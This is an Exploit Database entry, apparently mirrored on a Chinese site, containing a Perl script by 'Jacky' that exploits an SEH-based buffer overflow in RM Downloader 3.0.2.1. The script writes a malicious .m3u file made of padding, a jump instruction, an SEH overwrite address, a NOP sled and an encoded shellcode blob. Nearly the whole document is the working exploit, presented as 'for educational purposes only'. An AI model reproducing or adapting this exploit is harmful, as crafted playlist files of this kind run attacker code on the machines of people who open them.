RM Downloader – ‘.m3u’ Local Buffer Overflow (SEH)

• Exploit Database
• 39 阅读

• 作者： jacky
  日期： 2010-01-19
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11202/

• #!/usr/bin/perl -w
  # Author: Jacky
  # Version: 3.0.2.1
  # Tested on: Windows XP SP2
  
  #RM Downloader m3u Buffer Overflow (SEH) (Perl Edition )
  #Discovered by ::> Peter Van Eeckhoutte ( VERY BIG GREETZ TO HIM ) ;-)
  #Written by Jacky
  #All Greetz for Peter Van Eeckhoutte and Corelan Team !!!
  #I tried to exploit it by a Direct Ret , but on my system , it doesn't seem that it's a Direct
  #Ret Vulnerability , so i tried by SEH and Voila !
  #THIS EXPLOIT IS FOR EDUCATIONAL PURPOSES ONLY !!!
  
  my $file="RM.m3u";
  my $junk="A"x35059;
  my $nseh="\xeb\x1e\x90\x90";
  my $seh="\x1F\xEA\x02\x10"; # 0x1002EA1F::> Thanks for Peter who gave me this
  #address and it worked Perfectly ;-)
  #This Address works too ::> 0x01DD1111
  my $nops="\x90"x25;
  my $esp="\xbf\x1b\xaf\xd9\xd2\x2b\xc9\xb1\x24\xdb\xda\xd9\x74\x24\xf4\x5b".
  "\x31\x7b\x0e\x83\xeb\xfc\x03\x60\xa5\x3b\x27\x6a\x51\xff\xc8\x92".
  "\xa2\x8b\x8c\xae\x29\xf7\x0b\xb6\x2c\xe7\x9f\x09\x37\x7c\xc0\xb5".
  "\x46\x69\xb6\x3e\x7c\xe6\x48\xae\x4c\x38\xd3\x82\x2b\x78\x90\xdd".
  "\xf2\xb3\x54\xe0\x36\xa8\x93\xd9\xe2\x0b\x58\x68\xee\xdf\x3f\xb6".
  "\xf1\x34\xd9\x3d\xfd\x81\xad\x1e\xe2\x14\x59\x2b\x06\x9c\x9c\xc0".
  "\xbe\xfe\xba\x12\x02\xcf\x02\x7e\x0f\x70\xb3\xfb\xcf\x09\xbf\x88".
  "\x90\xe5\x34\xfe\x0c\x5b\xc1\x96\x24\x48\xdf\xed\xb5\x3e\xe0\xf1".
  "\xb5\xb5\x89\xcd\xea\xf8\xbf\x4d\x43\x72\xc7\x0e\xab\xff\x68\x78".
  "\xdc\x8a\x8d\x27\x74\x13\x73\x5d\x8a\x74\x73\x86\xf0\x1b\xe7\x2b".
  "\xd9\xbe\x8f\xce\x25";
  
  my $junk2="A"x5000;
  my $payload=$junk.$nseh.$seh.$nops.$esp.$junk2;
  
  
  open(INI,">$file");
  print INI $payload;
  print "[+]File Created Successfully!\n";
  print "[+]Done!\n";
  close(INI);